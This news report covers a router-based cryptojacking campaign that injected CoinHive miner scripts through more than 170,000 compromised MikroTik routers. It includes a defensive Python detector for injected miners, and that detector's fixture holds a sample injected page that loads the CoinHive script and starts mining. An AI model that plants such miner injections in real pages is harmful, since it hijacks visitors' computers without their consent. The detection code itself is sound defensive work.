A group of cybercriminals is using a network of vulnerable routers to push malicious code to unsuspecting users and mine cryptocurrency, according to a report by Trustwave security researchers.
An unknown group of attackers, possibly an organised criminal network, is exploiting a bug in more than 170,000 MikroTik routers to run a malicious program in the browsers of unsuspecting victims, whose computers then mine cryptocurrency for the attackers, according to Trustwave researcher Simon Kenin.
The attack uses a vulnerability, which MikroTik has already patched, to run a script from CoinHive in the browser of anyone connected through a compromised router. Most of the affected devices are in Brazil, but Kenin warned that the attack has spread, to a lesser extent, to other countries.
Another researcher, Troy Mursch, noticed a similar case in Moldova, where more than 25,000 MikroTik routers were also infected and also served a CoinHive script, which suggests the same group may be behind both campaigns.
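Because the miner is delivered as a script in pages served to users behind the router, a network operator can spot the compromise from the client side by scanning captured HTTP responses. The following is an added example (not Trustwave's, MikroTik's or the researchers' code): it flags the CoinHive loader URL and the CoinHive.Anonymous site key, and groups captures by site key, since the key identifies the account that receives the mined coins and is therefore a useful pivot for linking many routers to one campaign. The loader URL and constructor name are the publicly documented CoinHive indicators of the time; the sample pages, router labels and site key are constructed for the example.

```python
import re
from typing import Dict, List

# Indicators for the CoinHive in-browser miner. The loader URL and the
# CoinHive.Anonymous constructor are the publicly documented ones from the
# 2018 service; treat them as example indicators and extend the list with
# your own IOCs (mirrors, renamed copies of the script, other miners).
LOADER_RE = re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I)
SITE_KEY_RE = re.compile(
    r"new\s+CoinHive\.Anonymous\s*\(\s*['\"]([A-Za-z0-9_-]+)['\"]", re.I
)
SCRIPT_TAG_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_ATTR_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)


def find_injected_miner(body: str) -> Dict[str, object]:
    """Scan one HTTP response body for CoinHive miner indicators.

    Returns the loader URLs found, the site keys passed to
    CoinHive.Anonymous, and an overall verdict.
    """
    loaders: List[str] = []
    site_keys: List[str] = []
    for attrs, inline in SCRIPT_TAG_RE.findall(body):
        src = SRC_ATTR_RE.search(attrs)
        if src and LOADER_RE.search(src.group(1)):
            loaders.append(src.group(1))
        site_keys.extend(SITE_KEY_RE.findall(inline))
    return {
        "injected": bool(loaders or site_keys),
        "loaders": loaders,
        "site_keys": site_keys,
    }


def group_by_site_key(captures) -> Dict[str, List[str]]:
    """Group captured pages by the site key of the injected miner.

    Input is an iterable of (source_label, body) pairs, e.g. one capture
    per router under investigation. Pages from different routers that
    carry the same key point to a single campaign.
    """
    groups: Dict[str, List[str]] = {}
    for label, body in captures:
        for key in find_injected_miner(body)["site_keys"]:
            groups.setdefault(key, []).append(label)
    return groups


# Constructed sample responses (not real captures).
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/static/app.js"></script></head><body>Hello</body></html>"""

INJECTED_PAGE = """<html><head><title>Shop</title>
<script src="/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('ExampleSiteKey1234');
miner.start();
</script></head><body>Hello</body></html>"""

# A second site, seen through another router, carrying the same key.
INJECTED_PAGE_2 = INJECTED_PAGE.replace("Shop", "News")


if __name__ == "__main__":
    for name, page in [("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)]:
        print(name, find_injected_miner(page))
    print(group_by_site_key([("router-A", INJECTED_PAGE),
                             ("router-B", INJECTED_PAGE_2),
                             ("router-C", CLEAN_PAGE)]))
```

Run it against bodies pulled from a proxy log or a packet capture taken from a client behind the suspect router; a hit on a page whose origin server does not itself embed a miner is the tell-tale sign of injection in transit.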
MikroTik has fixed the specific vulnerability that allowed the routers to be exploited, but many devices have not been updated and remain compromised.
The problem is larger than the numbers suggest, Kenin explains, because MikroTik makes networking equipment that is widely used by internet service providers, large organisations and small and medium-sized businesses.
Simon Kenin added: “Let me explain how smart and methodical this attack is. Instead of trying to infect small sites with few visitors or finding sophisticated ways to run malicious software on end-user computers, the attacker went directly to the source: the router devices. There are hundreds of thousands of these devices around the world, used by ISPs as well as by different organizations and businesses, and each such device serves at least dozens if not hundreds of users every day.”